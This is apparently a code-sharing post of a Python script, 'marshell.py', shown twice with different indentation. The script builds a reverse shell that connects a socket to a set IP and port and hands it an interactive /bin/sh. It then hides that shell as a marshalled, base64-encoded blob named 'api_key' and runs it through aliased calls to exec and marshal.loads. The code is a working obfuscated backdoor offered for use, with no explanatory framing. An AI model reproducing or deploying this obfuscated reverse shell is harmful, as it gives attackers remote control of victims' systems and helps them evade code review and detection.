tunelko · February 21, 2025 17:15
diff --git a/marshell.py b/marshell.py
 #1. generate obfuscated marshalled b64 
 import marshal, binascii, base64
 IP = "127.0.0.1"
 PORT = 1234
 code = f"""
 import socket,subprocess,os
 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
 s.connect(("{IP}", {PORT}))
 os.dup2(s.fileno(),0)
 os.dup2(s.fileno(),1)
 os.dup2(s.fileno(),2)
 subprocess.call(["/bin/sh","-i"])
 """

 compiled_code = compile(code, "<string>", "exec")
 serialized = marshal.dumps(compiled_code)
 hex_data = binascii.hexlify(serialized)
 base64_data = base64.b64encode(serialized)

 #print("Hex:", hex_data)
 print("Base64:", base64_data)


 #2. get your shell  
 import marshal,binascii,base64 
 access=marshal.loads
 get=exec
 api_key_base64=b"4wAAAAAAAAAAAAAAAAQAAAAAAAAA83QBAACXAGQAZAFsAFoAZABkAWwBWgFkAGQBbAJaAgIAZQBqAAAAAAAAAAAAZQBqAwAAAAAAAAAAZQBqBAAAAAAAAAAApgIAAKsCAAAAAAAAAABaBWUFoAYAAAAAAAAAAAAAAAAAAAAAAAAAAGQCpgEAAKsBAAAAAAAAAAABAAIAZQJqBwAAAAAAAAAAZQWgCAAAAAAAAAAAAAAAAAAAAAAAAAAApgAAAKsAAAAAAAAAAABkAKYCAACrAgAAAAAAAAAAAQACAGUCagcAAAAAAAAAAGUFoAgAAAAAAAAAAAAAAAAAAAAAAAAAAKYAAACrAAAAAAAAAAAAZAOmAgAAqwIAAAAAAAAAAAEAAgBlAmoHAAAAAAAAAABlBaAIAAAAAAAAAAAAAAAAAAAAAAAAAACmAAAAqwAAAAAAAAAAAGQEpgIAAKsCAAAAAAAAAAABAAIAZQFqCQAAAAAAAAAAZAVkBmcCpgEAAKsBAAAAAAAAAAABAGQBUwApB+kAAAAATikCegkxMjcuMC4wLjFp0gQAAOkBAAAA6QIAAAB6By9iaW4vc2h6Ai1pKQraBnNvY2tldNoKc3VicHJvY2Vzc9oCb3PaB0FGX0lORVTaC1NPQ0tfU1RSRUFN2gFz2gdjb25uZWN02gRkdXAy2gZmaWxlbm/aBGNhbGypAPMAAAAA+gg8c3RyaW5nPvoIPG1vZHVsZT5yEgAAAAEAAABzxQAAAPADAQEB4AAb0AAb0AAb0AAb0AAb0AAb0AAb0AAb0AAb0AAb0AAb0AAb2AIPgCaELZAGlA6YdtQfMdECMtQCMoAB2AABhwmCCdAKHdEAHtQAHtAAHtgAB4AChAeIAY8IigiJCowKkDHRABXUABXQABXYAAeAAoQHiAGPCIoIiQqMCpAx0QAV1AAV0AAV2AAHgAKEB4gBjwiKCIkKjAqQMdEAFdQAFdAAFdgAD4AKhA+QGZg00BAg0QAh1AAh0AAh0AAh0AAhchAAAAA="
 api_key = base64.b64decode(api_key_base64)
 get(access(api_key))
	#1. generate obfuscated marshalled b64
	import marshal, binascii, base64
	IP = "127.0.0.1"
	PORT = 1234
	code = f"""
	import socket,subprocess,os
	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.connect(("{IP}", {PORT}))
	os.dup2(s.fileno(),0)
	os.dup2(s.fileno(),1)
	os.dup2(s.fileno(),2)
	subprocess.call(["/bin/sh","-i"])
	"""

	compiled_code = compile(code, "<string>", "exec")
	serialized = marshal.dumps(compiled_code)
	hex_data = binascii.hexlify(serialized)
	base64_data = base64.b64encode(serialized)

	#print("Hex:", hex_data)
	print("Base64:", base64_data)


	#2. get your shell
	import marshal,binascii,base64
	access=marshal.loads
	get=exec
	api_key_base64=b"4wAAAAAAAAAAAAAAAAQAAAAAAAAA83QBAACXAGQAZAFsAFoAZABkAWwBWgFkAGQBbAJaAgIAZQBqAAAAAAAAAAAAZQBqAwAAAAAAAAAAZQBqBAAAAAAAAAAApgIAAKsCAAAAAAAAAABaBWUFoAYAAAAAAAAAAAAAAAAAAAAAAAAAAGQCpgEAAKsBAAAAAAAAAAABAAIAZQJqBwAAAAAAAAAAZQWgCAAAAAAAAAAAAAAAAAAAAAAAAAAApgAAAKsAAAAAAAAAAABkAKYCAACrAgAAAAAAAAAAAQACAGUCagcAAAAAAAAAAGUFoAgAAAAAAAAAAAAAAAAAAAAAAAAAAKYAAACrAAAAAAAAAAAAZAOmAgAAqwIAAAAAAAAAAAEAAgBlAmoHAAAAAAAAAABlBaAIAAAAAAAAAAAAAAAAAAAAAAAAAACmAAAAqwAAAAAAAAAAAGQEpgIAAKsCAAAAAAAAAAABAAIAZQFqCQAAAAAAAAAAZAVkBmcCpgEAAKsBAAAAAAAAAAABAGQBUwApB+kAAAAATikCegkxMjcuMC4wLjFp0gQAAOkBAAAA6QIAAAB6By9iaW4vc2h6Ai1pKQraBnNvY2tldNoKc3VicHJvY2Vzc9oCb3PaB0FGX0lORVTaC1NPQ0tfU1RSRUFN2gFz2gdjb25uZWN02gRkdXAy2gZmaWxlbm/aBGNhbGypAPMAAAAA+gg8c3RyaW5nPvoIPG1vZHVsZT5yEgAAAAEAAABzxQAAAPADAQEB4AAb0AAb0AAb0AAb0AAb0AAb0AAb0AAb0AAb0AAb0AAb0AAb2AIPgCaELZAGlA6YdtQfMdECMtQCMoAB2AABhwmCCdAKHdEAHtQAHtAAHtgAB4AChAeIAY8IigiJCowKkDHRABXUABXQABXYAAeAAoQHiAGPCIoIiQqMCpAx0QAV1AAV0AAV2AAHgAKEB4gBjwiKCIkKjAqQMdEAFdQAFdAAFdgAD4AKhA+QGZg00BAg0QAh1AAh0AAh0AAh0AAhchAAAAA="
	api_key = base64.b64decode(api_key_base64)
	get(access(api_key))